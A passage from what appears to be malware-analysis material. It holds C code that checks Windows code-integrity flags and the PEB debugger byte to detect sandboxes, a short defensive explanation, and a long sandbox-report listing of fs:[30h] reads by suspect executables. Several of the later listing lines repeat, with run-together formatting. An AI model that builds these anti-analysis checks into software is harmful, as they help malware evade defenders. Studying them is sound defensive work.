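    if (options & CODEINTEGRITY_OPTION_TESTSIGN) return "test-signing on";
    return "production";
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>
typedef NTSTATUS (NTAPI *NtQSI_t)(ULONG, PVOID, ULONG, PULONG);

/* Live query, resolved at run time from ntdll as the sample does. -1 on failure. */
long query_code_integrity_options(void) {
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    NtQSI_t fn = ntdll ? (NtQSI_t)GetProcAddress(ntdll, "NtQuerySystemInformation") : NULL;
    CI_INFO info = { sizeof info, 0 };
    ULONG ret = 0;
    if (!fn || fn(SYSTEM_CODEINTEGRITY_INFORMATION_CLASS, &info, sizeof info, &ret) != 0)
        return -1;
    return (long)info.CodeIntegrityOptions;
}

/* PEB->BeingDebugged reached through the TEB: the same byte that the
 * fs:[30h] (x86) / gs:[60h] (x64) loads fetch, and what IsDebuggerPresent() returns. */
int peb_being_debugged(void) {
    return NtCurrentTeb()->ProcessEnvironmentBlock->BeingDebugged;
}
#endif

int main(void) {
    /* Constructed values: clean box, test-signing, kernel debug, CI off. */
    const unsigned long samples[] = { 0x01UL, 0x03UL, 0x81UL, 0x00UL };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("options=0x%02lx -> %s (analysis box: %d)\n", samples[i],
               ci_verdict(samples[i]), ci_looks_like_analysis_box(samples[i]));
#ifdef _WIN32
    long opts = query_code_integrity_options();
    if (opts >= 0) printf("live: 0x%lx -> %s\n", opts, ci_verdict((unsigned long)opts));
    printf("live: PEB.BeingDebugged=%d\n", peb_being_debugged());
#endif
    return 0;
}
```

A sandbox kernel booted with testsigning or debug enabled answers this query differently from a stock machine, and no user-mode hook on NtQuerySystemInformation is needed for the sample to notice. The durable fix is to sign monitoring drivers properly and keep the guest kernel in its default configuration; for the PEB read, a debugger that clears BeingDebugged still leaves NtGlobalFlag and the heap flags as tells, which this example does not cover.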
Source: C:\Users\user\Desktop\Md0q201V1D.exe | Code function: 0_2_00426B90 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\AppData\Roaming\gbhudtb | Code function: 14_2_02BE0042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\21.exe | Code function: 16_2_02D4D529 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\gbhudtb | Code function: 23_2_02CB0042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\gbhudtb | Code function: 23_2_02EB2B61 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B54F340 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B54DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B573B7A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5D6365 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B618B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h] (21 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B60131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5D4320 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5C53CA mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5423F6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5F23E3 mov ecx, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5F23E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B541BE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B56DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B544B94 mov edi, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B601BA8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5EEB8A mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5EEB8A mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B618BB6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B619BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5FD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B60138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B574BAD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B618A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5D4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B542240 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B542240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5D4248 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B58927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5FB260 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B545210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B563A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B558A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B548239 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B544A20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5CEA20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] (14 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B572ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B543ACA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B572AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B618ADD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B57D294 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B57DA88 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B55AAB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5712BD mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5712BD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B541AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B575AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B60E962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B618966 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B54395E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B56B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B54B171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B543138 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B57513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B6189E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5431E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5D41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B574190 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B572990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B54519E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B54519E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B57A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B56C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B61F1B5 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B57C9BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60A189 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B60A189 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5761A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5761A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B547055 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B602073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B611074 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56F86D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F018 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F018 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B558800 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B614015 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B614015 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574020 mov edi, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F019 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B61F019 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5470C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5458EC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543880 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543880 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57F0BF mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57F0BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57F0BF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5890AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618F6A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54A745 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57DF4C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546F60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546F60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56E760 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56E760 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CF6A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CF6A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56F716 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B574710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5DFF10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5DFF10 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C707 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C707 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57C707 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57E730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B73D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56B73D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544F2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B544F2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D7CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57D7CA mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5837F5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D6652 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573E70 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CE6C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B57CE6C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h]
